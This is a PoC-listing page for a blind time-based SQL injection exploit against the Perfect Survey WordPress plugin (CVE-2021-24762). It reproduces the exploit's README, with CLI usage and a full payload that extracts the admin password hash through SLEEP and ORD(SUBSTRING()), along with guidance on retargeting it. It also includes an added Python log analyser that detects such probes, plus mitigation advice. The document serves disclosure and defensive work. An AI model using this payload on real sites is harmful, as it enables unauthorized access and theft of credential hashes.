Associated vulnerability

Title: WordPress plugin SQL injection vulnerability (CVE-2021-24762)

Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It lets users set up a personal blog on a server running PHP and MySQL. A WordPress plugin is an open-source application plugin for WordPress. Versions of the Perfect Survey WordPress plugin before 1.5.2 contain a SQL injection vulnerability, caused by the database-backed application not validating externally supplied input before using it in SQL statements. An attacker can exploit this vulnerability to execute unauthorized SQL commands.

Introduction

# exploit_cve-2021-24762
This repo shows an exploit for CVE-2021-24762. It is a blind SQLi exploit that, in the default configuration, retrieves the admin user's password hash.
> While doing a lab based on WordPress with the Perfect Survey plugin, I got stuck on a SQL vulnerability. The only available PoCs I found were based on sqlmap and weren't working properly in the lab I was working on (there were a lot of additional issues, e.g. the application returning 404, timeouts varying too much, and other issues). So I created this to exploit the lab.
## Goals
- This PoC exploits CVE-2021-24762, a vulnerability in the Perfect Survey WordPress plugin. The exploit is a time-based SQL injection using SLEEP, and it obtains the password hash of the 'admin' user, which is the default user on WordPress installations.
- Where it works: Perfect Survey plugin versions < 1.5.2.
## Impact and Severity
- CVE-2021-24762: [CVSS 9.8 (Critical)]
- Impacts: confidentiality, integrity, availability, unauthorized access.
## Environment
- Software requirements: Python 3.
## How to use
```
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/
   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
```
1. The Python script receives the parameters listed above. If they are not passed, the script runs with its default values.
2. You will normally need to pass at least the URL, with -u or --url. The other parameters will probably work with their defaults.
3. In the default configuration, it retrieves the password hash of the user admin. This is set in the payload variable, in the value compared against user_login:
   `payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`
   If you need the hash of another user, change "0x61646d696e" (the hex encoding of "admin") according to your needs.
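A defender-side complement to the payload described above, added here and not part of the author's repository: a small Python log analyser that flags admin-ajax.php requests carrying the SLEEP / ORD(SUBSTRING()) pattern, counts probes per client IP (character-by-character extraction produces a long run of near-identical requests from one source), and uses the recorded response time to separate attempts from delays that actually executed. The log format, the response-time field and the ajax action and parameter names in the sample are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (not real traffic). Assumed format: ip - - [ts] "request" status bytes micros.
# The ajax action and parameter names are placeholders, not the plugin's real ones.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Oct/2025:14:00:58 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 71 48210
10.0.0.5 - - [10/Oct/2025:14:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=PLACEHOLDER_ACTION&id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20WHERE%20ORD(SUBSTRING((SELECT%20user_pass%20FROM%20wp_users%20WHERE%20user_login%3D0x61646d696e)%2C1%2C1))%3D35%20AND%20SLEEP(30))%20AS%20a) HTTP/1.1" 200 512 310455
10.0.0.5 - - [10/Oct/2025:14:01:33 +0000] "GET /wp-admin/admin-ajax.php?action=PLACEHOLDER_ACTION&id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20WHERE%20ORD(SUBSTRING((SELECT%20user_pass%20FROM%20wp_users%20WHERE%20user_login%3D0x61646d696e)%2C1%2C1))%3D36%20AND%20SLEEP(30))%20AS%20a) HTTP/1.1" 200 512 30204911
10.0.0.9 - - [10/Oct/2025:14:01:40 +0000] "GET /index.php?s=sleep HTTP/1.1" 200 9031 120334
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ (?P<micros>\d+)$')

# Time-based blind SQLi indicators, matched on the URL-decoded request target.
INDICATORS = {
    "delay": re.compile(r"\bSLEEP\s*\(", re.I),
    "char_extract": re.compile(r"\bORD\s*\(\s*SUBSTRING\s*\(", re.I),
}

def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m: return None
    entry = m.groupdict()
    entry["decoded"] = unquote_plus(entry["target"])
    entry["seconds"] = int(entry["micros"]) / 1_000_000
    return entry

def classify(entry, slow_threshold=5.0):
    """Indicators found in an admin-ajax.php request, plus whether the injected delay fired."""
    if "/wp-admin/admin-ajax.php" not in entry["decoded"]:
        return [], False
    hits = [name for name, rx in INDICATORS.items() if rx.search(entry["decoded"])]
    return hits, bool(hits) and entry["seconds"] >= slow_threshold

def analyse(log_text, slow_threshold=5.0):
    """Flag probes, count them per client IP, and count how many delays actually fired."""
    flagged, per_ip, confirmed = [], Counter(), 0
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None: continue
        hits, slow = classify(entry, slow_threshold)
        if hits:
            flagged.append((entry["ip"], entry["ts"], hits, slow))
            per_ip[entry["ip"]] += 1
            confirmed += int(slow)
    return flagged, per_ip, confirmed
```

A slow response to a request that carries the delay primitive means the injected SQL actually ran, which is the signal that the installation is vulnerable rather than merely being probed.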
## Risks and limitations
- Limitation: In its current configuration, this PoC only obtains password hashes from WordPress installations with the default database structure. If you face a modified environment, you need to change this payload:
    `payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`
## Mitigation and remediation (recommendations)
- Mitigation recommendations: Update the plugin to version 1.5.2 or later.
- References:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    - https://www.getperfectsurvey.com/
## Warning and authorizations
**Restricted use** — This repo contains sensitive content intended for ethical and responsible use only.
Remember that you must have written permission from the owner of the system you are testing. Any use outside this scope is not allowed and will be your responsibility (do you want to go to jail?).
## Repo structure
- `exploit_cve-2021-24762.py` — Exploit.
- `README.md` — This file.
## Changelog
`2025-10-10 — c4cnm — Creation and initial modifications`
## Contact
- Author: Red Team CAIS:/Matheus Camargo (c4cnm), matheus.camargo@rnp.br.
## License
`GNU General Public License v3 (GPL)`
        
File snapshot

 [4.0K]  /data/pocs/b24405bebca539ee5e077e59d8a43d1716bbc0e4
├── [6.4K]  exploit_cve-2021-24762.py
├── [ 34K]  LICENSE
└── [3.9K]  README.md
0 directories, 3 files

Notes

1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.